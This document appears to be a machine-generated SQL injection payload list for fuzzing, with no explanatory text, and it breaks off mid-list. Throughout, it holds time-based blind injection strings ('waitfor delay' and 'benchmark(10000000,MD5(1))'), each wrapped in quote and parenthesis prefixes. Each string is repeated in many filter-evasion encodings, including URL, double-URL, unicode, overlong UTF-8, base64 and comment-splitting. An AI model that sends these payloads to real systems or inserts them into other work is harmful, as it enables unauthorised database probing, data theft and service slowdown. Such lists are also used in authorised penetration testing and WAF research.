%u0029%u003B%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0027%u002D%u002D%u000A
);waitfor delay '0:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--

);waitfor /*!30261delay '0:0:__TIME__'*/--

);waitfor /*!00000delay '0:0:__TIME__'*/--

);waitfor delay '0:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--

%C0%AB%C0%BBwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AF%C0%AF%C0%AF%C0%8A
%)%;%w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%_%_%T%I%M%E%_%_%'%-%-%

);waitfor delay '0:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--
 and '0having'='0having'
);waitfor delay '0:0:__TIME__'--
-- sp_password
);waitfor/**/delay/**/'0:0:__TIME__'--

);waitfor--nlsJxpk%0Adelay--BjxuyveRT%0A'0:0:__TIME__'----XBHCWW%0A
);waitfor%23NPdFwkVgpX%0Adelay%23PHTBbHUObNb%0A'0:0:__TIME__'--%23VRVhikDejrX%0A
);waitfor%23AfDChdHm%0Adelay%23FDXGdvQ%0A'0:0:__TIME__'--%23rHVtTUHN%0A
);waitfor%05delay%0A'0:0:__TIME__'--

);waitfor%23%0Adelay%23%0A'0:0:__TIME__'--%23%0A
);waitfor%0Adelay%0A'0:0:__TIME__'--

);waitfor--%0Adelay--%0A'0:0:__TIME__'----%0A
);waitfor+delay+'0:0:__TIME__'--

);waitfor%0Ddelay%0D'0:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--

);waitfor delay %bf%270:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--

%EF%BC%87;waitfor delay %EF%BC%870:0:__TIME__%EF%BC%87--

%00%27;waitfor delay %00%270:0:__TIME__%00%27--

';waitfor delay '0:0:__TIME__'--
%00
Jzt3YWl0Zm9yIGRlbGF5ICcwOjA6X19USU1FX18nLS0K
';waitfor delay '0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--

%2527%253B%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%255F%255F%2554%2549%254D%2545%255F%255F%2527%252D%252D%250A
%27%3B%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%5F%5F%54%49%4D%45%5F%5F%27%2D%2D%0A
%u0027%u003B%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0027%u002D%u002D%u000A
';waitfor delay '0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--

';waitfor /*!30424delay '0:0:__TIME__'*/--

';waitfor /*!00000delay '0:0:__TIME__'*/--

';waitfor delay '0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--

%C0%AF%C0%BBwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AF%C0%AF%C0%AF%C0%8A
%'%;%w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%_%_%T%I%M%E%_%_%'%-%-%

';waitfor delay '0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--
 and '0having'='0having'
';waitfor delay '0:0:__TIME__'--
-- sp_password
';waitfor/**/delay/**/'0:0:__TIME__'--

';waitfor--zBKCVBp%0Adelay--IbPDqSF%0A'0:0:__TIME__'----CGriQoNwrcZ%0A
';waitfor%23ecoRrm%0Adelay%23eWuUPNXtSiVX%0A'0:0:__TIME__'--%23ioChIUlT%0A
';waitfor%23qSJoyrYtrDx%0Adelay%23noaQCIXy%0A'0:0:__TIME__'--%23AMTUiJOsSze%0A
';waitfor%09delay%0C'0:0:__TIME__'--

';waitfor%23%0Adelay%23%0A'0:0:__TIME__'--%23%0A
';waitfor%0Ddelay%0B'0:0:__TIME__'--

';waitfor--%0Adelay--%0A'0:0:__TIME__'----%0A
';waitfor+delay+'0:0:__TIME__'--

';waitfor%0Ddelay%0A'0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--

%bf%27;waitfor delay '0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--

';waitfor delay '0:0:__TIME__'--

";waitfor delay %EF%BC%870:0:__TIME__%EF%BC%87--

";waitfor delay %00%270:0:__TIME__%00%27--

";waitfor delay '0:0:__TIME__'--
%00
Ijt3YWl0Zm9yIGRlbGF5ICcwOjA6X19USU1FX18nLS0K
";waitfor delay '0:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--

%2522%253B%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%255F%255F%2554%2549%254D%2545%255F%255F%2527%252D%252D%250A
%22%3B%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%5F%5F%54%49%4D%45%5F%5F%27%2D%2D%0A
%u0022%u003B%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0027%u002D%u002D%u000A
";waitfor delay '0:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--

";waitfor /*!30221delay '0:0:__TIME__'*/--

";waitfor /*!00000delay '0:0:__TIME__'*/--

";waitfor delay '0:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--

%C0%AA%C0%BBwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AF%C0%AF%C0%AF%C0%8A
%"%;%w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%_%_%T%I%M%E%_%_%'%-%-%

";waitfor delay '0:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--
 and '0having'='0having'
";waitfor delay '0:0:__TIME__'--
-- sp_password
";waitfor/**/delay/**/'0:0:__TIME__'--

";waitfor--xtsWvW%0Adelay--PPjMVKxgzcSQ%0A'0:0:__TIME__'----BevCUDOaSNDw%0A
";waitfor%23BFjFJaAjd%0Adelay%23XzvtowqUE%0A'0:0:__TIME__'--%23drqDJpd%0A
";waitfor%23BCEeCmLh%0Adelay%23UWlLzSa%0A'0:0:__TIME__'--%23VLfvcpK%0A
";waitfor%04delay%0F'0:0:__TIME__'--

";waitfor%23%0Adelay%23%0A'0:0:__TIME__'--%23%0A
";waitfor%0Bdelay%0B'0:0:__TIME__'--

";waitfor--%0Adelay--%0A'0:0:__TIME__'----%0A
";waitfor+delay+'0:0:__TIME__'--

";waitfor%0Adelay%09'0:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--

";waitfor delay %bf%270:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--

";waitfor delay '0:0:__TIME__'--

%EF%BC%87);waitfor delay %EF%BC%870:0:__TIME__%EF%BC%87--

%00%27);waitfor delay %00%270:0:__TIME__%00%27--

');waitfor delay '0:0:__TIME__'--
%00
Jyk7d2FpdGZvciBkZWxheSAnMDowOl9fVElNRV9fJy0tCg==
');waitfor delay '0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--

%2527%2529%253B%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%255F%255F%2554%2549%254D%2545%255F%255F%2527%252D%252D%250A
%27%29%3B%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%5F%5F%54%49%4D%45%5F%5F%27%2D%2D%0A
%u0027%u0029%u003B%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0027%u002D%u002D%u000A
');waitfor delay '0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--

');waitfor /*!30902delay '0:0:__TIME__'*/--

');waitfor /*!00000delay '0:0:__TIME__'*/--

');waitfor delay '0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--

%C0%AF%C0%AB%C0%BBwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AF%C0%AF%C0%AF%C0%8A
%'%)%;%w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%_%_%T%I%M%E%_%_%'%-%-%

');waitfor delay '0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--
 and '0having'='0having'
');waitfor delay '0:0:__TIME__'--
-- sp_password
');waitfor/**/delay/**/'0:0:__TIME__'--

');waitfor--aLtIxUl%0Adelay--pMcBXcrpW%0A'0:0:__TIME__'----BewTyXEM%0A
');waitfor%23fufyyQ%0Adelay%23wGQJqqMwRt%0A'0:0:__TIME__'--%23AMbxqvi%0A
');waitfor%23JrtgxyUAZx%0Adelay%23EmVvuhs%0A'0:0:__TIME__'--%23OSOJwj%0A
');waitfor%0Adelay%02'0:0:__TIME__'--

');waitfor%23%0Adelay%23%0A'0:0:__TIME__'--%23%0A
');waitfor%09delay%09'0:0:__TIME__'--

');waitfor--%0Adelay--%0A'0:0:__TIME__'----%0A
');waitfor+delay+'0:0:__TIME__'--

');waitfor%09delay%09'0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--

%bf%27);waitfor delay '0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--

');waitfor delay '0:0:__TIME__'--

");waitfor delay %EF%BC%870:0:__TIME__%EF%BC%87--

");waitfor delay %00%270:0:__TIME__%00%27--

");waitfor delay '0:0:__TIME__'--
%00
Iik7d2FpdGZvciBkZWxheSAnMDowOl9fVElNRV9fJy0tCg==
");waitfor delay '0:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--

%2522%2529%253B%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%255F%255F%2554%2549%254D%2545%255F%255F%2527%252D%252D%250A
%22%29%3B%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%5F%5F%54%49%4D%45%5F%5F%27%2D%2D%0A
%u0022%u0029%u003B%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0027%u002D%u002D%u000A
");waitfor delay '0:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--

");waitfor /*!30226delay '0:0:__TIME__'*/--

");waitfor /*!00000delay '0:0:__TIME__'*/--

");waitfor delay '0:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--

%C0%AA%C0%AB%C0%BBwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AF%C0%AF%C0%AF%C0%8A
%"%)%;%w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%_%_%T%I%M%E%_%_%'%-%-%

");waitfor delay '0:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--
 and '0having'='0having'
");waitfor delay '0:0:__TIME__'--
-- sp_password
");waitfor/**/delay/**/'0:0:__TIME__'--

");waitfor--MSuEyAMWF%0Adelay--BjuBqIhz%0A'0:0:__TIME__'----ORZJCYI%0A
");waitfor%23OiZWNQTTDoD%0Adelay%23PjYQIBDDIq%0A'0:0:__TIME__'--%23HRXRfBoPT%0A
");waitfor%23rNDqMLmOdIN%0Adelay%23zqREWCbUrNt%0A'0:0:__TIME__'--%23JnqKdJ%0A
");waitfor%06delay%0D'0:0:__TIME__'--

");waitfor%23%0Adelay%23%0A'0:0:__TIME__'--%23%0A
");waitfor%0Ddelay%09'0:0:__TIME__'--

");waitfor--%0Adelay--%0A'0:0:__TIME__'----%0A
");waitfor+delay+'0:0:__TIME__'--

");waitfor%0Adelay%0A'0:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--

");waitfor delay %bf%270:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--

");waitfor delay '0:0:__TIME__'--

));waitfor delay %EF%BC%870:0:__TIME__%EF%BC%87--

));waitfor delay %00%270:0:__TIME__%00%27--

));waitfor delay '0:0:__TIME__'--
%00
KSk7d2FpdGZvciBkZWxheSAnMDowOl9fVElNRV9fJy0tCg==
));waitfor delay '0:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--

%2529%2529%253B%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%255F%255F%2554%2549%254D%2545%255F%255F%2527%252D%252D%250A
%29%29%3B%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%5F%5F%54%49%4D%45%5F%5F%27%2D%2D%0A
%u0029%u0029%u003B%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0027%u002D%u002D%u000A
));waitfor delay '0:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--

));waitfor /*!30442delay '0:0:__TIME__'*/--

));waitfor /*!00000delay '0:0:__TIME__'*/--

));waitfor delay '0:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--

%C0%AB%C0%AB%C0%BBwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AF%C0%AF%C0%AF%C0%8A
%)%)%;%w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%_%_%T%I%M%E%_%_%'%-%-%

));waitfor delay '0:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--
 and '0having'='0having'
));waitfor delay '0:0:__TIME__'--
-- sp_password
));waitfor/**/delay/**/'0:0:__TIME__'--

));waitfor--LPFMeYGa%0Adelay--cmtYZHbnCUE%0A'0:0:__TIME__'----JcDcEHAEr%0A
));waitfor%23ogSvoc%0Adelay%23QbnSTFdZV%0A'0:0:__TIME__'--%23bSwHcAZodVM%0A
));waitfor%23RtYMtwVgGxW%0Adelay%23xgffjmPQ%0A'0:0:__TIME__'--%23dtRCgnVZ%0A
));waitfor%0Cdelay%04'0:0:__TIME__'--

));waitfor%23%0Adelay%23%0A'0:0:__TIME__'--%23%0A
));waitfor%09delay%0C'0:0:__TIME__'--

));waitfor--%0Adelay--%0A'0:0:__TIME__'----%0A
));waitfor+delay+'0:0:__TIME__'--

));waitfor%09delay%09'0:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--

));waitfor delay %bf%270:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--

));waitfor delay '0:0:__TIME__'--

%EF%BC%87));waitfor delay %EF%BC%870:0:__TIME__%EF%BC%87--

%00%27));waitfor delay %00%270:0:__TIME__%00%27--

'));waitfor delay '0:0:__TIME__'--
%00
JykpO3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQo=
'));waitfor delay '0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--

%2527%2529%2529%253B%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%255F%255F%2554%2549%254D%2545%255F%255F%2527%252D%252D%250A
%27%29%29%3B%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%5F%5F%54%49%4D%45%5F%5F%27%2D%2D%0A
%u0027%u0029%u0029%u003B%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0027%u002D%u002D%u000A
'));waitfor delay '0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--

'));waitfor /*!30581delay '0:0:__TIME__'*/--

'));waitfor /*!00000delay '0:0:__TIME__'*/--

'));waitfor delay '0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--

%C0%AF%C0%AB%C0%AB%C0%BBwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AF%C0%AF%C0%AF%C0%8A
%'%)%)%;%w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%_%_%T%I%M%E%_%_%'%-%-%

'));waitfor delay '0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--
 and '0having'='0having'
'));waitfor delay '0:0:__TIME__'--
-- sp_password
'));waitfor/**/delay/**/'0:0:__TIME__'--

'));waitfor--kEPqXvePFXh%0Adelay--nxOHqaQN%0A'0:0:__TIME__'----PcagkmjewpOW%0A
'));waitfor%23IbCucOSDQs%0Adelay%23dIVImhjEAd%0A'0:0:__TIME__'--%23VOmSRBG%0A
'));waitfor%23MohWiAEVg%0Adelay%23RkiZrMEMzyYo%0A'0:0:__TIME__'--%23RUwfGo%0A
'));waitfor%08delay%0D'0:0:__TIME__'--

'));waitfor%23%0Adelay%23%0A'0:0:__TIME__'--%23%0A
'));waitfor%09delay%0D'0:0:__TIME__'--

'));waitfor--%0Adelay--%0A'0:0:__TIME__'----%0A
'));waitfor+delay+'0:0:__TIME__'--

'));waitfor%0Adelay%0C'0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--

%bf%27));waitfor delay '0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--

'));waitfor delay '0:0:__TIME__'--

"));waitfor delay %EF%BC%870:0:__TIME__%EF%BC%87--

"));waitfor delay %00%270:0:__TIME__%00%27--

"));waitfor delay '0:0:__TIME__'--
%00
IikpO3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQo=
"));waitfor delay '0:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--

%2522%2529%2529%253B%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%255F%255F%2554%2549%254D%2545%255F%255F%2527%252D%252D%250A
%22%29%29%3B%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%5F%5F%54%49%4D%45%5F%5F%27%2D%2D%0A
%u0022%u0029%u0029%u003B%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0027%u002D%u002D%u000A
"));waitfor delay '0:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--

"));waitfor /*!30721delay '0:0:__TIME__'*/--

"));waitfor /*!00000delay '0:0:__TIME__'*/--

"));waitfor delay '0:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--

%C0%AA%C0%AB%C0%AB%C0%BBwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AF%C0%AF%C0%AF%C0%8A
%"%)%)%;%w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%_%_%T%I%M%E%_%_%'%-%-%

"));waitfor delay '0:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--
 and '0having'='0having'
"));waitfor delay '0:0:__TIME__'--
-- sp_password
"));waitfor/**/delay/**/'0:0:__TIME__'--

"));waitfor--gMDZfi%0Adelay--taQnXMZJEUD%0A'0:0:__TIME__'----brgJEuXG%0A
"));waitfor%23nnWvSmC%0Adelay%23jqaccBiurWY%0A'0:0:__TIME__'--%23BAJnNDzONon%0A
"));waitfor%23WIcXzGDK%0Adelay%23ERQUnwzfPiqy%0A'0:0:__TIME__'--%23LMtprEJSxT%0A
"));waitfor%0Fdelay%01'0:0:__TIME__'--

"));waitfor%23%0Adelay%23%0A'0:0:__TIME__'--%23%0A
"));waitfor%09delay%09'0:0:__TIME__'--

"));waitfor--%0Adelay--%0A'0:0:__TIME__'----%0A
"));waitfor+delay+'0:0:__TIME__'--

"));waitfor%0Adelay%0A'0:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--

"));waitfor delay %bf%270:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--

"));waitfor delay '0:0:__TIME__'--

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#
%00
YmVuY2htYXJrKDEwMDAwMDAwLE1ENSgxKSkjCg==
benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

%2562%2565%256E%2563%2568%256D%2561%2572%256B%2528%2531%2530%2530%2530%2530%2530%2530%2530%252C%254D%2544%2535%2528%2531%2529%2529%2523%250A
%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%2C%4D%44%35%28%31%29%29%23%0A
%u0062%u0065%u006E%u0063%u0068%u006D%u0061%u0072%u006B%u0028%u0031%u0030%u0030%u0030%u0030%u0030%u0030%u0030%u002C%u004D%u0044%u0035%u0028%u0031%u0029%u0029%u0023%u000A
benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark%C0%AA10000000%C0%AEMD5%C0%AA1%C0%AB%C0%AB%C0%AB%C0%8A
%b%e%n%c%h%m%a%r%k%(%1%0%0%0%0%0%0%0%,%M%D%5%(%1%)%)%#%

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#
 and '0having'='0having'
benchmark(10000000,MD5(1))#
sp_password
benchmark(10000000,MD5(1))#/**/
benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#%06
benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#%09
benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#+
benchmark(10000000,MD5(1))#%0A
benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#
%00
MSBvciBiZW5jaG1hcmsoMTAwMDAwMDAsTUQ1KDEpKSMK
1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

%2531%2520%256F%2572%2520%2562%2565%256E%2563%2568%256D%2561%2572%256B%2528%2531%2530%2530%2530%2530%2530%2530%2530%252C%254D%2544%2535%2528%2531%2529%2529%2523%250A
%31%20%6F%72%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%2C%4D%44%35%28%31%29%29%23%0A
%u0031%u0020%u006F%u0072%u0020%u0062%u0065%u006E%u0063%u0068%u006D%u0061%u0072%u006B%u0028%u0031%u0030%u0030%u0030%u0030%u0030%u0030%u0030%u002C%u004D%u0044%u0035%u0028%u0031%u0029%u0029%u0023%u000A
1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1 /*!30335or benchmark(10000000,MD5(1))*/#

1 /*!00000or benchmark(10000000,MD5(1))*/#

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1%C0%AAor%C0%AAbenchmark%C0%AA10000000%C0%AEMD5%C0%AA1%C0%AB%C0%AB%C0%AB%C0%8A
%1 %o%r %b%e%n%c%h%m%a%r%k%(%1%0%0%0%0%0%0%0%,%M%D%5%(%1%)%)%#%

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#
 and '0having'='0having'
1 or benchmark(10000000,MD5(1))#
sp_password
1/**/or/**/benchmark(10000000,MD5(1))#

1--AvXSIf%0Aor--WTxlpuWHsu%0Abenchmark(10000000,MD5(1))#

1%23rYthWzhwAHt%0Aor%23czyNglAFGaG%0Abenchmark(10000000,MD5(1))#

1%23TshXPNPJLk%0Aor%23WbSedLdgS%0Abenchmark(10000000,MD5(1))#

1%0For%02benchmark(10000000,MD5(1))#

1%23%0Aor%23%0Abenchmark(10000000,MD5(1))#

1%0Dor%0Cbenchmark(10000000,MD5(1))#

1--%0Aor--%0Abenchmark(10000000,MD5(1))#

1+or+benchmark(10000000,MD5(1))#

1%0Dor%09benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#
%00
IiBvciBiZW5jaG1hcmsoMTAwMDAwMDAsTUQ1KDEpKSMK
" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

%2522%2520%256F%2572%2520%2562%2565%256E%2563%2568%256D%2561%2572%256B%2528%2531%2530%2530%2530%2530%2530%2530%2530%252C%254D%2544%2535%2528%2531%2529%2529%2523%250A
%22%20%6F%72%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%2C%4D%44%35%28%31%29%29%23%0A
%u0022%u0020%u006F%u0072%u0020%u0062%u0065%u006E%u0063%u0068%u006D%u0061%u0072%u006B%u0028%u0031%u0030%u0030%u0030%u0030%u0030%u0030%u0030%u002C%u004D%u0044%u0035%u0028%u0031%u0029%u0029%u0023%u000A
" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

" /*!30127or benchmark(10000000,MD5(1))*/#

" /*!00000or benchmark(10000000,MD5(1))*/#

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

%C0%AA%C0%AAor%C0%AAbenchmark%C0%AA10000000%C0%AEMD5%C0%AA1%C0%AB%C0%AB%C0%AB%C0%8A
%" %o%r %b%e%n%c%h%m%a%r%k%(%1%0%0%0%0%0%0%0%,%M%D%5%(%1%)%)%#%

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#
 and '0having'='0having'
" or benchmark(10000000,MD5(1))#
sp_password
"/**/or/**/benchmark(10000000,MD5(1))#

"--GteEjcrSmytu%0Aor--eaNyPQLai%0Abenchmark(10000000,MD5(1))#

"%23qSIcQqHwgds%0Aor%23eSSiJmkl%0Abenchmark(10000000,MD5(1))#

"%23DMwzqXUmpzw%0Aor%23cdDEdlXu%0Abenchmark(10000000,MD5(1))#

"%0Eor%08benchmark(10000000,MD5(1))#

